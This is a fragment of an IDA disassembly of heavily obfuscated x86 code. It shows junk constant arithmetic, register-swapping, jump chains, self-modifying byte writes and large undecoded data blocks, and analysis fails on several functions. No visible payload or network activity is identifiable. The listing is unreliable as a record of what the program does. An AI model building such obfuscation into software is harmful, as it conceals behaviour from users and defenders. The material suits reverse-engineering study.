db 0E9h ;
db 22h ; "
db 0
db 0
db 0E9h ;
db 74h ; t
db 3Bh ; ;
db 0
db 0
align 4
; START OF FUNCTION CHUNK FOR sub_43B655
loc_439E94: ; CODE XREF: sub_43B655:loc_43BFF6�j
imul byte ptr [edx]
cmp al, 0A4h
jnz loc_43B70A
call sub_43B6FF
; END OF FUNCTION CHUNK FOR sub_43B655
; ---------------------------------------------------------------------------
db 0
db 0
db 87h ;
db 4
db 24h ; $
db 8Bh ;
db 0C8h ;
db 58h ; X
db 87h ;
db 4
db 24h ; $
db 0E9h ;
db 0BBh ;
db 0Ch
db 0
db 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_439EB4: ; CODE XREF: sub_43B7F1:loc_43DDB3�j
js loc_43D16C
mov edx, [eax]
or edx, edx
jz sub_43B7FC
jmp loc_43AD69
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
db 81h, 0E7h, 0C3h
dd 81D2F325h, 0B3B574C7h, 1A8FE82Fh, 87000000h, 5682414h
dd 0E90043ACh, 22FBh, 0C60000h, 875D58C3h, 0E88B2404h
dd 0C300C358h, 1680000h, 0E90043B2h, 1E46h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_439F05: ; CODE XREF: sub_43C14F:loc_43D7C4�j
; _5qvhby1c:0043DD56�j
mov ebx, edx
xchg ebx, [esp+0]
push 9590008Ah
pop edx
rol edx, 15h
push offset loc_43D160
jmp nullsub_231
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
db 2 dup(0), 0C6h
dd 68588B00h, 3DB22803h, 0E4685058h, 0E954F370h, 1158h
dd 0BFAB6800h, 0ACE90043h, 5, 87240487h, 0C18B240Ch, 1A716859h
dd 815F5A02h, 2CC83CEFh, 0B8066878h, 0A4E90043h, 0F000018h
dd 2D7082h, 81FA1B00h, 286801E0h, 14C0C1B9h, 0B394C881h
dd 0A5E948D0h, 2Ch, 4671F281h, 5A68F167h, 0E90043D9h, 3D24h
dd 0E2A7689Ch, 0C15A4450h, 0CA8115C2h, 0EB1066F1h, 61AE8h
dd 0BC2E900h, 7D830000h, 840F00F8h, 33A2h, 43B55168h, 62CE900h
dd 81000000h, 9D095CEAh, 2364E972h, 0C30000h, 317AC181h
dd 0F5E9B53Bh, 27h, 15FC6800h, 81581ACCh, 9AAA13E8h, 0E7E08148h
dd 0F70C98EDh, 40000C0h, 2BBFE900h, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_229. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A7DE
loc_439FF7: ; CODE XREF: sub_43A7DE:loc_43C502�j
push edx
mov edx, offset loc_43C15B
jmp loc_43D140
; END OF FUNCTION CHUNK FOR sub_43A7DE
; ---------------------------------------------------------------------------
dw 0F00h
dd 0DFE8Ch, 0BD000000h, 0ADE789DAh, 1285890Fh, 0E6E90000h
dd 0Dh, 14E9C585h, 81000009h, 0BC521AC0h, 0B3F08142h, 815A7A43h
dd 0F899D9C0h, 0FE05E8D5h, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DF7B
loc_43A03C: ; CODE XREF: sub_43DF7B:loc_439DC1�j
push (offset loc_43CADE+1)
jmp loc_43BE84
; END OF FUNCTION CHUNK FOR sub_43DF7B
; ---------------------------------------------------------------------------
dw 9600h
; ---------------------------------------------------------------------------
xchg esi, [esp]
retn
; ---------------------------------------------------------------------------
dd 0E9108B00h, 2E3Fh, 243C8700h, 0BABF575Fh, 0E90043C1h
dd 0AFDh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_43A066: ; CODE XREF: sub_43C14F:loc_43C28B�j
mov byte ptr [ebx], 87h
pop ebx
push 537D718Fh
pop eax
jmp loc_43BF93
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
mov esi, 0B02B596Eh
jmp sub_43A156
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
loc_43A081: ; DATA XREF: sub_43A382:loc_43DC80�o
add eax, 0AC739EFDh
push offset loc_43A332
jmp loc_43CD50
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
; ---------------------------------------------------------------------------
imul dword ptr [edi+41h]
retf 0E92Bh
; ---------------------------------------------------------------------------
dw 79Ch
dd 0DF850000h, 3345E9h, 14870000h, 358B5A24h, 43B138h
dd 43C10668h, 2044E900h, 0
; ---------------------------------------------------------------------------
loc_43A0BC: ; CODE XREF: _5qvhby1c:0043CECF�j
sbb eax, edi
xor ebp, 0E181E025h
test eax, 7D91D6D9h
jmp loc_43A20B
; ---------------------------------------------------------------------------
align 10h
loc_43A0D0: ; DATA XREF: sub_43B655:loc_43B70A�o
push esi
mov esi, offset loc_43DE20
jmp loc_43AC1D
; ---------------------------------------------------------------------------
align 4
dd 0E9CB3300h, 1BF8h, 0A5E9C785h, 38h, 9C880F00h, 87000023h
dd 9D5A2414h, 14C1E9h, 68000000h, 43AFE7h, 3192E9h, 7C60000h
dd 0C1E85F03h, 81000037h, 0E452EDE3h, 8C3C130h, 8FBBF381h
dd 0DD030A97h, 2712E8h, 0C30000h, 1D84E900h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7FC
loc_43A133: ; CODE XREF: sub_43B7FC+1�j
mov ebx, offset loc_43CE82
jmp loc_43B6DD
; END OF FUNCTION CHUNK FOR sub_43B7FC
; ---------------------------------------------------------------------------
align 2
dw 94E8h
dd 20h, 3B2FE900h, 0C2810000h, 0B13EE6D7h, 2436E9h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43A156 proc near ; CODE XREF: _5qvhby1c:0043A07A�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043C163 SIZE 00000012 BYTES
xchg ebx, [esp+0]
pop ebx
lea eax, nullsub_234
call sub_43DB36
add [edx+7F792AD7h], bh
jmp loc_43C163
sub_43A156 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0C30000h, 241C8700h, 8B241487h, 0FD035ADAh, 7BB5C781h
dd 3CE99743h, 3Bh, 5BE8E0Fh, 0F6810000h, 0B0F0B7E2h, 87D38B52h
dd 92BB2414h, 0E90043AAh, 24F4h, 0C2F36800h, 0F1E94134h
dd 3Ch, 87D88B53h, 76B8241Ch, 0E90043A2h, 22D9h, 0C30000h
dd 0EE08100h, 81642924h, 8485ECC0h, 55C881E3h, 816C8EA4h
dd 95F73F0h, 3ABBE9D1h, 0F6810000h, 0A9921114h, 330CE8h
dd 18E95600h, 25h, 0C4096800h, 49E90043h, 23h, 0A1E9D00Bh
db 2Dh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_43A20B: ; CODE XREF: _5qvhby1c:0043A0CA�j
jnz loc_43DAC3
loc_43A211: ; CODE XREF: _5qvhby1c:loc_43CEC0�j
add edi, 3508EB14h
call sub_43B845
loc_43A21C: ; CODE XREF: _5qvhby1c:loc_43AB73�j
push offset dword_43BFCC
jmp locret_43DB78
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
dd 1FBAE900h, 0E9000000h, 35C2h, 55E90000h, 27h, 0E900C300h
; CODE XREF: _5qvhby1c:0043CEAE�j
dd 2416h, 0FFFBE9E9h, 0C300FFh, 240AE9h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_43A253: ; CODE XREF: sub_43C14F+1D4F�j
push edx
call sub_43B7F1
add cl, ch
retf
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
dd 1BFFFFFEh, 2069E9F1h, 0 ; CODE XREF: _5qvhby1c:loc_43D17D�j
; ---------------------------------------------------------------------------
locret_43A268: ; CODE XREF: _5qvhby1c:0043C35A�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B893
loc_43A269: ; CODE XREF: sub_43B893+D�j
jmp loc_43D288
; END OF FUNCTION CHUNK FOR sub_43B893
; ---------------------------------------------------------------------------
align 10h
xchg eax, [esp]
mov ebp, eax
pop eax
retn
; ---------------------------------------------------------------------------
align 4
loc_43A278: ; DATA XREF: _5qvhby1c:loc_43D910�w
push offset byte_43BDC7
loc_43A27D: ; DATA XREF: _5qvhby1c:0043D917�w
jmp loc_43D0F3
; ---------------------------------------------------------------------------
align 4
loc_43A284: ; CODE XREF: _5qvhby1c:0043A82F�j
jp near ptr dword_439F20+62h
test ebp, ecx
jmp loc_43AA6F
; ---------------------------------------------------------------------------
db 81h ;
db 0E8h ;
db 6Fh ; o
db 8Dh ;
db 0D1h ;
db 42h ; B
db 0F7h ;
db 0C0h ;
db 0
db 1
db 0
db 0
db 0E9h ;
db 0CBh ;
db 1Bh
db 0
db 0
db 0C6h ;
db 3
db 89h ;
db 5Bh ; [
db 81h ;
db 0C6h ;
db 0D5h ;
db 97h ;
db 3Dh ; =
db 57h ; W
db 0E8h ;
db 1Dh
db 1Eh
db 0
db 0
db 0
db 0Fh
db 8Ah ;
db 1Fh
db 32h ; 2
db 0
db 0
db 87h ;
db 3Ch ; <
db 24h ; $
db 87h ;
db 2Ch ; ,
db 24h ; $
db 8Bh ;
db 0FDh ;
db 0E9h ;
db 0DBh ;
db 0Bh
db 0
db 0
db 0
; ---------------------------------------------------------------------------
loc_43A2C6: ; CODE XREF: _5qvhby1c:0043AD71�j
xchg esi, [esp]
pop esi
xchg ecx, [esp]
call sub_43B4B3
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
xchg edx, [esp]
mov esi, edx
pop edx
push edx
mov edx, offset byte_43B1D9
jmp loc_43D561
; ---------------------------------------------------------------------------
db 2 dup(0), 3
dd 3102E8F5h, 0
; ---------------------------------------------------------------------------
lea eax, [ebp-6Eh]
push 0F8BE3F8Fh
xchg esi, [esp]
mov edx, esi
pop esi
xor edx, 0A0CF70C1h
jmp loc_43C7FB
; ---------------------------------------------------------------------------
align 2
dw 8A0Fh
dd 1D0Fh, 5E243487h, 0F8E8C031h, 2Dh, 2467860Fh, 9C990000h
dd 0B7A1E981h, 0E958D6E8h, 0FFFFFEC9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43A332: ; DATA XREF: _5qvhby1c:0043A087�o
push edx
mov edx, eax
xchg edx, [esp]
push offset loc_43A8B1
jmp locret_43B64B
; ---------------------------------------------------------------------------
dw 0C600h
dd 335B8303h, 0B4C168C0h, 5FE90043h, 32h, 811EC6C1h, 0C55E0C6h
dd 5ECE3BF3h, 5F3E9h, 0B8000000h, 43CD2Bh, 0FFFABBE9h
dd 0C300FFh, 156FE900h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43A37B: ; CODE XREF: _5qvhby1c:0043C7ED�j
jmp loc_43B715
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43A382 proc near ; CODE XREF: _5qvhby1c:0043BCE3�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B41B SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0043C21E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043C48A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C801 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D421 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DC80 SIZE 0000000A BYTES
xchg edi, [esp+0]
xchg edx, [esp+0]
mov edi, edx
pop edx
jmp loc_43B41B
sub_43A382 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 24348700h, 0B7CF685Eh, 34873916h, 5EC68B24h, 0AE83E881h
dd 0F0817838h, 80F6AB2Fh, 1E3EE9h, 2373E800h, 0
; ---------------------------------------------------------------------------
mov byte ptr [edx], 3
pop edx
or edi, 0ADC06CACh
sub edi, 0A6E4E917h
xor edi, 0D3E75E9Ah
cmp edi, 4FDE6549h
jmp loc_43CEC0
; ---------------------------------------------------------------------------
db 2 dup(0), 0C6h ; CODE XREF: _5qvhby1c:0043DD8D�j
dd 3C879D00h, 5FC78B24h, 0DCE9008Bh, 2Fh, 0FDA7820Fh, 487FFFFh
dd 242C8724h, 0FF5DC58Bh, 4300C015h, 0C0E85000h, 0
dd 37685600h, 5EEAD529h, 5AB5F681h, 0C6817749h, 0E2638C7Eh
dd 0E95EC685h, 25D5h, 4870000h, 53C88B24h, 0BCE9D98Bh
dd 57000022h, 0FADCE068h, 241C87C8h, 40E9FB8Bh, 0C3000006h
dd 0E900C300h, 0CC9h, 0C20B0000h, 38A3E9h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B8D3
loc_43A455: ; CODE XREF: sub_43B8D3:loc_43DD62�j
mov byte ptr [ebx], 87h
pop ebx
xchg ecx, [esp+4+var_4]
mov esi, ecx
pop ecx
sub esi, 8E1D6CFAh
add esi, 0E392C00Bh
jmp loc_43D239
; END OF FUNCTION CHUNK FOR sub_43B8D3
; =============== S U B R O U T I N E =======================================
sub_43A470 proc near ; DATA XREF: _5qvhby1c:0043DCFD�o
; FUNCTION CHUNK AT 0043D296 SIZE 00000005 BYTES
push 5DE59493h
pop ebx
or ebx, 0ACA28E97h
xor ebx, 0FE585590h
rol ebx, 19h
add ebx, 0F1F8809Ah
push offset byte_43B29B
jmp loc_43D296
sub_43A470 endp
; ---------------------------------------------------------------------------
db 2 dup(0), 50h
dd 439EF5B8h, 0FA48E900h, 2DB9FFFFh, 0E9F52181h, 1237h
dd 98E78100h, 817C2AFDh, 1AEE82C7h, 243C87FCh, 0B55E9h
dd 14E38100h, 8750EA9Fh, 685E2434h, 0BE550563h, 0DAC88158h
dd 0C166FC98h, 0A5E819C0h, 28h, 5FE900C3h, 37h, 0E900C300h
dd 527h, 0CF9F6800h, 0DEE90043h, 0F000037h, 22B58Dh, 3DDE900h
dd 0
; ---------------------------------------------------------------------------
loc_43A508: ; CODE XREF: _5qvhby1c:0043D216�j
xchg eax, [esp]
pop eax
imul byte ptr [edx]
cmp al, 0A4h
jnz loc_43A51B
jmp loc_43C343
; ---------------------------------------------------------------------------
loc_43A51B: ; CODE XREF: _5qvhby1c:0043A510�j
push offset loc_43B869
jmp locret_43CC18
; ---------------------------------------------------------------------------
db 2 dup(0), 0C3h ; CODE XREF: _5qvhby1c:loc_43CE8E�j
dd 1BE90000h, 3FFFFFCh, 3C081C5h, 8BD8C556h, 343E800h
dd 0BAE90000h, 39h, 55FD8B57h, 0BF57243Ch, 43D38Eh, 213CE9h
dd 81580000h, 1B6191C8h, 1AC0C1FDh, 5BEE8h, 0E9000000h
dd 1714h, 21EDE900h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_43A574: ; CODE XREF: sub_43C14F:loc_43BF93�j
or eax, 74C5160Eh
and eax, 44434349h
add eax, 4D01F6B8h
sub eax, 736D0AB1h
add eax, 0E26DAF8Bh
loc_43A592: ; DATA XREF: sub_43C14F-88F�o
xchg eax, [esp+4+var_4]
push ebx
jmp loc_43D7C4
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
align 4
xchg edi, [esp]
pop edi
add edx, 0CA851CC2h
jmp loc_43B0DE
; ---------------------------------------------------------------------------
align 4
dd 68098B00h, 439F8Ch, 1194E9h, 87000000h, 815E2434h, 0A1A05F2h
dd 7268370Eh, 0E90043CEh, 0FFFFF881h, 0FE810000h, 0EE9B5F70h
dd 0FFF982E9h, 0C300FFh, 70EE9h, 6E90000h, 81000007h, 273E89C0h
dd 0B6B8680Bh, 64E90043h, 19h, 24048700h, 3AD6858h, 4873AD2h
dd 58D08B24h, 25EA81h, 0FFE9EB2Bh, 20h, 0CC88C681h, 55E92C3Eh
db 9, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B845
loc_43A623: ; CODE XREF: sub_43B845:loc_43CDB2�j
push edi
push 5F18C1C9h
pop edi
call sub_43DF7B
; END OF FUNCTION CHUNK FOR sub_43B845
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43A630: ; CODE XREF: sub_43B7F1+25D3�j
jmp nullsub_232
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43A637: ; DATA XREF: sub_43DB36+3�o
xchg eax, [esp]
mov ecx, eax
pop eax
mov byte ptr [eax], 0C3h
call nullsub_237
mov eax, offset sub_42524F
jmp loc_43D38C
; ---------------------------------------------------------------------------
align 10h
loc_43A650: ; CODE XREF: _5qvhby1c:0043D9BC�j
jo loc_43C87A
jmp loc_43D352
; ---------------------------------------------------------------------------
loc_43A65B: ; CODE XREF: _5qvhby1c:0043AD5D�j
push edx
mov edx, ebp
xchg edx, [esp]
mov ebp, esp
push ecx
push esi
mov esi, edx
jmp loc_43DEBE
; ---------------------------------------------------------------------------
dd 830F0000h, 34A5h, 0F2D880Fh, 55520000h, 25EAE85Ah, 0E8000000h
; DATA XREF: _5qvhby1c:0043D933�w
dd 0FFFFF594h
; ---------------------------------------------------------------------------
loc_43A688: ; DATA XREF: sub_43B7F1-484�o
mov edx, [eax]
push ecx
push 6931C597h
pop ecx
and ecx, 520D097h
jmp loc_439E60
; ---------------------------------------------------------------------------
loc_43A69C: ; CODE XREF: _5qvhby1c:0043BD8F�j
xchg ebp, [esp]
mov esi, ebp
pop ebp
pushf
jmp loc_43A8E9
; ---------------------------------------------------------------------------
dd 7890000h, 7F85C75Fh, 44FFFFFFh, 0C7756265h, 67678345h
dd 45C77265h, 65642087h, 2B24E974h, 50000000h, 0CB36868h
dd 0C0C15817h, 0F4E88115h, 0E9815F72h, 94Ah, 6BE9DD0Bh
dd 5000002Ch, 0FBB7EC68h, 0F963E8E8h, 0FFFFh, 2496E9h
dd 0D98D0F00h, 1Dh
; ---------------------------------------------------------------------------
loc_43A700: ; CODE XREF: _5qvhby1c:0043B0F0�j
jmp near ptr dword_43A170+59h
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0F6Eh, 0BDE9CD0Bh
db 1Dh, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43A713 proc near ; CODE XREF: sub_43AE40:loc_43D48A�p
; FUNCTION CHUNK AT 0043B76C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043C37D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D1E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D9A8 SIZE 00000011 BYTES
xchg edi, [esp+0]
xchg ebx, [esp+0]
mov edi, ebx
pop ebx
mov esi, [esi]
jmp loc_43D1E7
sub_43A713 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 1869890Fh, 34870000h, 0C0815E24h, 0F1293892h, 0BEE9C5A3h
dd 16h, 63E99900h, 0FFFFF9h, 0AEE38100h, 0E9470484h, 26EEh
dd 0EFAEE81h, 4AE9CA1Ah, 30h, 0AE9DDF81h, 0BDE95B61h, 1Ch
dd 240C8751h, 68028859h, 43AF64h, 7DCE9h, 81000000h, 4E4269E1h
dd 2404872Ah, 8B240C87h, 6C659C1h, 1673E987h, 0C30000h
dd 0CF8B5100h, 0E9240C87h, 1520h, 698B0F00h, 87000020h
dd 9C5B241Ch, 0C23C3068h, 0E7815FFAh, 92EADB56h, 43D4D768h
dd 1C9CE900h, 0
; ---------------------------------------------------------------------------
loc_43A7C4: ; DATA XREF: _5qvhby1c:0043B606�o
sub eax, edx
jz loc_43DC0F
call sub_43BEF5
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43A7D1: ; CODE XREF: sub_43A948:loc_43BB8F�j
; sub_43A948+3114�j
push offset loc_43C6B5
jmp nullsub_224
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
align 4
db 0, 9Ch
; =============== S U B R O U T I N E =======================================
sub_43A7DE proc near ; CODE XREF: _5qvhby1c:loc_43D660�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439FF7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C502 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D140 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
xchg edi, [esp+0]
pop edi
jmp loc_43C502
sub_43A7DE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 20E95700h, 0FFFFFFh, 0DCC08100h, 81D01061h, 0BEEE11F0h
dd 0E8C503D5h, 223Ah, 82F08100h, 0E92F75CFh, 13F9h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7FC
loc_43A814: ; CODE XREF: sub_43B7FC:loc_43CE88�j
call sub_43A948
; END OF FUNCTION CHUNK FOR sub_43B7FC
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0F68h
; ---------------------------------------------------------------------------
loc_43A820: ; CODE XREF: _5qvhby1c:0043D3A7�j
jge loc_43AD4E
add [ebx], cl
setalc
cmp edi, 8249A932h
jmp loc_43A284
; ---------------------------------------------------------------------------
dd 12E1E800h, 0C3C10000h, 241C8707h, 0A433685Bh, 44E90043h
; CODE XREF: _5qvhby1c:0043C282�j
dd 0C3000021h, 0BD336852h, 0D3E90043h, 0F000014h, 90D86h
dd 42E99D00h, 0E9000003h, 1688h, 3C870000h, 5FCF8B24h
dd 43A1B468h, 980E900h, 0F000000h, 0CDB8Fh, 240C8700h
dd 1B9DE8h, 5FE90000h, 0F000026h, 23C88Bh, 1FC3C100h, 18E7E181h
dd 0C1F7C70Dh, 40h, 1857E9h
db 3 dup(0)
; ---------------------------------------------------------------------------
locret_43A8AB: ; CODE XREF: _5qvhby1c:0043ADCA�j
retn
; ---------------------------------------------------------------------------
loc_43A8AC: ; CODE XREF: _5qvhby1c:0043C62C�j
jmp loc_43B860
; ---------------------------------------------------------------------------
loc_43A8B1: ; DATA XREF: _5qvhby1c:0043A338�o
push edi
push 0AD9622B2h
pop edi
or edi, 7E19D49Ah
add edi, 84CC45Ah
jmp loc_43AA4E
; ---------------------------------------------------------------------------
locret_43A8C9: ; CODE XREF: _5qvhby1c:0043D716�j
retn
; ---------------------------------------------------------------------------
align 4
dd 0FFFF6CE8h, 66E900FFh, 30h, 299CE9h, 0E3E90000h, 0E9FFFFF8h
dd 3609h
db 0
; ---------------------------------------------------------------------------
loc_43A8E9: ; CODE XREF: _5qvhby1c:0043A6A3�j
push 3D831FB0h
pop eax
rol eax, 1Ah
xor eax, 0E7CCA587h
push 43A52Fh
jmp loc_43CE8E
; ---------------------------------------------------------------------------
align 4
mov ecx, 0AE05AC8Ch
jmp loc_43B409
; ---------------------------------------------------------------------------
dw 0C600h
dd 815B9C03h, 0F4C0DAE0h, 28C08133h, 31756C3h, 2E19E8C5h
dd 0C5E90000h, 0FFFFF9h, 5E07D181h, 8AE94192h, 0FFFFFFBh
dd 2F2684h, 0FAE38100h, 0E903B081h, 0B6Bh
; =============== S U B R O U T I N E =======================================
sub_43A948 proc near ; CODE XREF: sub_43B7FC:loc_43A814�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043A7D1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043B9CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BB8F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C034 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043C5C3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043C6B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C6BC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C6E0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043D681 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D9A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DA51 SIZE 00000010 BYTES
xchg ebx, [esp+0]
pop ebx
mov byte ptr [edi], 9
xchg eax, [esp+0]
jmp loc_43D9A3
sub_43A948 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 0C6C8D0Fh, 0
dd 0FFFB8CE9h, 0D72300FFh, 0E06D881h, 57E9AFCEh, 5800000Ch
dd 1BAAE081h, 0C081771Ch, 0EA2BB128h, 7BE80005h, 0Ch, 23F58700h
dd 7E999C1h, 1Ch, 59505100h, 0FFF929E8h, 0E90000FFh, 3213h
dd 0DD6AC181h, 0F1819484h, 4B3290D0h, 43CDFA68h, 0F8A0E900h
dd 0FFFFh, 0BFE9D5F7h
db 0F9h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_236. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_43A9C4 proc near ; DATA XREF: _5qvhby1c:0043B854�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043ADA8 SIZE 0000001D BYTES
push ebp
mov ebp, esi
xchg ebp, [esp+4+var_4]
push 6F73CC4h
pop esi
and esi, 149C7878h
or esi, 0BB900450h
jmp loc_43ADA8
sub_43A9C4 endp
; ---------------------------------------------------------------------------
locret_43A9E1: ; CODE XREF: _5qvhby1c:0043B49F�j
retn
; ---------------------------------------------------------------------------
dw 0E900h ; CODE XREF: sub_43D6B0+7�j
dd 0FFFFFC73h, 0FFF5B9E9h, 810000FFh, 0B5E513CEh, 0F4E1E9EBh
dd 0E981FFFFh, 407571CBh, 279E9h, 0EC0C100h, 0FFF648E9h
dd 198B00FFh, 0FFF453E9h, 0C30000FFh
; ---------------------------------------------------------------------------
loc_43AA18: ; CODE XREF: _5qvhby1c:0043CF22�j
jmp loc_43B4D7
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DACC
loc_43AA1F: ; CODE XREF: sub_43DACC-2912�j
; sub_43D51D-1135�j ...
push offset byte_43D71B
jmp loc_43C960
; END OF FUNCTION CHUNK FOR sub_43DACC
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
loc_43AA2C: ; CODE XREF: _5qvhby1c:0043D6F3�j
jmp loc_43DDA1
; ---------------------------------------------------------------------------
align 2
dw 840Fh
dd 0FFFFFEB6h, 0E781D61Bh, 0DAE9675Bh, 52D890Fh, 0
dd 1C77E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43AA4E: ; CODE XREF: _5qvhby1c:0043A8C4�j
jmp near ptr dword_43A498+15h
; ---------------------------------------------------------------------------
align 4
test eax, esi
jmp loc_43D17D
; ---------------------------------------------------------------------------
align 4
dd 70E99900h, 0C300000Eh, 19B0E900h, 8BE90000h
db 0F4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43AA6F: ; CODE XREF: _5qvhby1c:0043A28C�j
jo near ptr dword_43A3DC+19h
pop edx
jmp loc_43AD4E
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B2E6
loc_43AA7D: ; CODE XREF: sub_43B2E6+260E�j
jmp nullsub_240
; END OF FUNCTION CHUNK FOR sub_43B2E6
; ---------------------------------------------------------------------------
dw 0E900h
dd 2954h, 0F5030000h, 1FE0C681h, 64866A0h, 0B9A9685Eh
dd 0D1E90043h, 6, 8E0D568h, 0E6815E37h, 240B965Ch, 1FA2CE81h
dd 0F68175CEh, 0E7699967h, 958BC681h, 84E96D9Ch, 0FFFFF5h
dd 0F2815200h, 47B9676Fh, 20C8E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43AAD2: ; CODE XREF: sub_43B7F1:loc_43CFC8�j
popf
call sub_439E68
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43AADA: ; CODE XREF: _5qvhby1c:loc_43B3C5�j
mov ebp, 8A6CB1C6h
and edi, 0BA795CDBh
jmp loc_43B602
; ---------------------------------------------------------------------------
dw 0C100h
dd 1F890FE6h, 0BEC1819Dh, 0F75311F0h, 40000C1h, 569E900h
dd 68000000h, 43C992h, 1BC3E9h, 87000000h, 1487240Ch, 5ACA8B24h
dd 5C82C681h, 0C3E87C87h
db 8, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439DA0
loc_43AB23: ; CODE XREF: sub_439DA0+1�j
xchg ecx, [esp+0]
pop ecx
add eax, 0A0454389h
call sub_43DCB5
loc_43AB32: ; CODE XREF: _5qvhby1c:0043DCF1�j
jmp nullsub_230
; END OF FUNCTION CHUNK FOR sub_439DA0
; ---------------------------------------------------------------------------
align 4
dd 0F6E8E900h, 0FFFFh, 58240487h, 448A008Bh, 558BE005h
dd 2D70E8FCh, 0E9000000h, 3255h, 0F1E90000h, 31h, 188DE900h
dd 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
jmp locret_43CBE7
; ---------------------------------------------------------------------------
db 0E9h ;
db 3Eh ; >
db 0Dh
db 0
db 0
; ---------------------------------------------------------------------------
loc_43AB73: ; CODE XREF: _5qvhby1c:00439DBA�j
jmp loc_43A21C
; ---------------------------------------------------------------------------
dd 0F7990000h, 0DA6C68F9h, 0BEE90043h, 0FFFFF5h, 878707C6h
dd 0FB8B241Ch, 0FC6C15Bh, 0E19BE681h, 0C6F70ECBh, 4000000h
